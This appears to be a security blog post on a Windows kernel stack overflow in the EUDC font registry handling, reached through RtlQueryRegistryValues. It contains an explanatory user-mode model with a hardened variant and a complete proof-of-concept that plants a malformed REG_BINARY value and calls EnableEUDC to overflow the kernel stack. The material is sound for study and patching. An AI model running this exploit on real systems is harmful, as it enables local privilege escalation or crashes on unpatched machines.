New vulnerability allows local privilege escalation on Win7/Vista, bypassing UAC
16 March 2011, 10:19
An interesting local privilege escalation to SYSTEM level appeared on November 24 in an article on The Code Project (http://www.codeproject.com/KB/vista-security/uac.aspx). Within a few hours it was removed from that site, but the information had already spread across the network, and in my opinion removing it was pointless. The escalation works on systems from XP through Vista/Win7, and server versions are also affected. What is even more interesting, the vulnerability is relevant both on x86 and on x64 systems; however, the published PoC code ran successfully only on x86.




The cause is insufficient parameter checking in the kernel runtime function RtlQueryRegistryValues():

NTSTATUS RtlQueryRegistryValues(
    __in     ULONG                      RelativeTo,
    __in     PCWSTR                     Path,
    __inout  PRTL_QUERY_REGISTRY_TABLE  QueryTable,
    __in_opt PVOID                      Context,
    __in_opt PVOID                      Environment
);

This function is used to read several registry values in one call; each entry of the _RTL_QUERY_REGISTRY_TABLE array describes one value and where its result should be stored.

typedef struct _RTL_QUERY_REGISTRY_TABLE {
    PRTL_QUERY_REGISTRY_ROUTINE QueryRoutine;
    ULONG                       Flags;
    PWSTR                       Name;
    PVOID                       EntryContext;
    ULONG                       DefaultType;
    PVOID                       DefaultData;
    ULONG                       DefaultLength;
} RTL_QUERY_REGISTRY_TABLE, *PRTL_QUERY_REGISTRY_TABLE;

The EntryContext field of this structure points to the output buffer, and here lies the interesting nuance: depending on the type of the value read, that buffer is interpreted either as a UNICODE_STRING structure (for string types) or as a raw buffer whose first ULONG holds the buffer's size (for everything else).

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

Which interpretation is used is decided by the type of the registry value being queried, not by the caller. All well and good, but a registry value was found, HKCU\EUDC\[Language]\SystemDefaultEUDCFont, that can be written with ordinary user rights, so its type can be changed to REG_BINARY, and that is read by the kernel function win32k.sys->NtGdiEnableEudc(). That function assumes the value is REG_SZ and places a UNICODE_STRING structure on its stack as the output buffer. If the value is actually REG_BINARY, RtlQueryRegistryValues treats the first ULONG of that structure (the Length and MaximumLength fields read together) as the size of the buffer it is allowed to fill and copies the value data straight into the stack frame: a classic stack overflow.



With these nuances in mind, a PoC was developed (by noobpwnftw) that creates the registry value, overwrites the return address on the stack through the overflowing buffer, and executes arbitrary code in kernel mode.
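The type confusion described above, as an added user-mode model that is not the kernel's code and not part of the original post: the registry value, the query routine and the stack frame are simplified stand-ins (the non-string path is assumed to take the first ULONG of EntryContext as the buffer size and to write a length/type header before the data; the status codes are placeholders, not real NTSTATUS values). It shows what a UNICODE_STRING looks like when misread as a size, how a constructed 0x600-byte REG_BINARY value reaches a sentinel standing in for the saved return address, and how a caller that checks the returned type before using the buffer stays intact.

```c
/* Model of the RtlQueryRegistryValues type confusion behind the EUDC bug.
 * Added example, not Windows code: registry, query routine and stack frame are
 * simplified stand-ins so it runs in user mode on any little-endian host. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint16_t USHORT;
typedef uint32_t ULONG;
typedef uint16_t WCHAR;
typedef WCHAR   *PWSTR;

#define REG_SZ     1u
#define REG_BINARY 3u
#define STATUS_SUCCESS               0   /* placeholder codes, not real NTSTATUS values */
#define STATUS_BUFFER_TOO_SMALL     -1
#define STATUS_OBJECT_TYPE_MISMATCH -2

typedef struct { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING;

/* Constructed stand-in for one stored registry value. */
typedef struct { ULONG Type; const void *Data; ULONG DataLength; } RegValue;

/* Simplified model of how RtlQueryRegistryValues fills EntryContext:
 * string types -> EntryContext is a UNICODE_STRING, copy bounded by MaximumLength;
 * anything else -> EntryContext is a raw buffer whose first ULONG is its size
 * (assumed layout: data is written after a (length, type) header). */
static int model_query(const RegValue *v, void *entry_context)
{
    if (v->Type == REG_SZ) {
        UNICODE_STRING *us = entry_context;
        if (v->DataLength > us->MaximumLength)
            return STATUS_BUFFER_TOO_SMALL;
        memcpy(us->Buffer, v->Data, v->DataLength);
        us->Length = (USHORT)v->DataLength;
        return STATUS_SUCCESS;
    }
    ULONG size, hdr[2];
    memcpy(&size, entry_context, sizeof size);    /* whatever sits there is "the size" */
    if (v->DataLength + sizeof hdr > size)
        return STATUS_BUFFER_TOO_SMALL;
    hdr[0] = v->DataLength;
    hdr[1] = v->Type;
    memcpy(entry_context, hdr, sizeof hdr);
    memcpy((uint8_t *)entry_context + sizeof hdr, v->Data, v->DataLength);
    return STATUS_SUCCESS;
}

/* Hardened variant: the caller states which type it expects and nothing is
 * written unless the stored type matches. */
static int model_query_typed(const RegValue *v, ULONG expected, void *entry_context)
{
    if (v->Type != expected)
        return STATUS_OBJECT_TYPE_MISMATCH;
    return model_query(v, entry_context);
}

/* Emulated frame of a caller like NtGdiEnableEudc: the UNICODE_STRING handed to
 * the query sits below other locals and the saved return address. Spill gives the
 * model room so the overflow stays inside this object rather than the real stack. */
typedef struct {
    UNICODE_STRING FontName;
    uint8_t        Locals[16];
    uint32_t       SavedReturn;
    uint8_t        Spill[0x800];
} EmulatedFrame;

static WCHAR   g_font_name[64];   /* what FontName.Buffer points at (0x80 bytes) */
static uint8_t g_blob[0x600];     /* constructed REG_BINARY payload, all 'A' */

static void init_frame(EmulatedFrame *f)
{
    memset(f, 0, sizeof *f);
    f->FontName.MaximumLength = sizeof g_font_name;
    f->FontName.Buffer        = g_font_name;
    f->SavedReturn            = 0xDEADBEEFu;   /* sentinel for the return address */
}

static RegValue binary_value(void)
{
    memset(g_blob, 'A', sizeof g_blob);
    RegValue v = { REG_BINARY, g_blob, (ULONG)sizeof g_blob };
    return v;
}

/* The "buffer size" the non-string path reads from a UNICODE_STRING:
 * Length | MaximumLength << 16 = 0x00800000, i.e. 8 MB of permitted copy. */
ULONG bogus_buffer_size(void)
{
    EmulatedFrame f;
    ULONG size;
    init_frame(&f);
    memcpy(&size, &f.FontName, sizeof size);
    return size;
}

/* Vulnerable caller: assumes REG_SZ and never checks what type came back. */
uint32_t run_vulnerable(void)
{
    EmulatedFrame f;
    RegValue v = binary_value();
    init_frame(&f);
    model_query(&v, &f.FontName);
    return f.SavedReturn;             /* 0x41414141: overwritten by the payload */
}

/* Same caller with the type check: the frame is left untouched. */
uint32_t run_hardened(void) { EmulatedFrame f; RegValue v = binary_value(); init_frame(&f); model_query_typed(&v, REG_SZ, &f.FontName); return f.SavedReturn; }
int hardened_status(void)   { EmulatedFrame f; RegValue v = binary_value(); init_frame(&f); return model_query_typed(&v, REG_SZ, &f.FontName); }

int main(void)
{
    printf("size seen by non-string path: 0x%08x\n", (unsigned)bogus_buffer_size());
    printf("vulnerable: saved return = 0x%08x\n", (unsigned)run_vulnerable());
    printf("hardened:   saved return = 0x%08x (status %d)\n", (unsigned)run_hardened(), hardened_status());
    return 0;
}
```

The point of the model is the second memcpy in model_query: once the type check is the registry's job rather than the caller's, the caller's own UNICODE_STRING becomes the destination buffer, and a MaximumLength of 0x80 turns into a size of 0x00800000 when read as a ULONG. Later versions of the WDK give RtlQueryRegistryValues an RTL_QUERY_REGISTRY_TYPECHECK flag so the real routine can perform the comparison shown in model_query_typed.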

A detailed description of the vulnerability is available here:

http://www.kb.cert.org/vuls/id/529673
http://secunia.com/advisories/42356

Alternative PoC from d_olex (original):
#include <windows.h>
#include <stdio.h>
#include <tchar.h>

#define EUDC_FONT_VAL "SystemDefaultEUDCFont"

/* EnableEUDC() is exported by gdi32.dll but not declared in the public headers,
   so it is resolved at run time here (added so the PoC builds as-is). */
typedef BOOL (WINAPI *EnableEUDC_t)(BOOL fEnableEUDC);

int _tmain(int argc, _TCHAR *argv[])
{
    HKEY hKey;
    char szKeyName[MAX_PATH], Buff[0x600];

    // the value lives under HKCU\EUDC\<ANSI code page number>
    sprintf_s(szKeyName, MAX_PATH, "EUDC\\%d", GetACP());

    // create the registry key
    LONG Code = RegCreateKeyA(HKEY_CURRENT_USER, szKeyName, &hKey);
    if (Code != ERROR_SUCCESS)
    {
        printf("ERROR: RegCreateKey() fails with status %d\n", Code);
        return -1;
    }

    // delete the old value
    RegDeleteValueA(hKey, EUDC_FONT_VAL);

    // create a new value "SystemDefaultEUDCFont" of type REG_BINARY
    FillMemory(Buff, sizeof(Buff), 'A');
    Code = RegSetValueExA(hKey, EUDC_FONT_VAL, 0, REG_BINARY, (const BYTE *)Buff, sizeof(Buff));

    RegCloseKey(hKey);

    if (Code != ERROR_SUCCESS)
    {
        printf("ERROR: RegSetValueEx() fails with status %d\n", Code);
        return -1;
    }

    // call the vulnerable function (win32k.sys->NtGdiEnableEudc via gdi32!EnableEUDC)
    EnableEUDC_t pEnableEUDC = (EnableEUDC_t)GetProcAddress(LoadLibraryA("gdi32.dll"), "EnableEUDC");
    if (pEnableEUDC == NULL)
    {
        printf("ERROR: EnableEUDC() not found in gdi32.dll\n");
        return -1;
    }
    pEnableEUDC(TRUE);

    return 0;
}
Views: 467 | Added by: w1zard | Rating: 0.0/0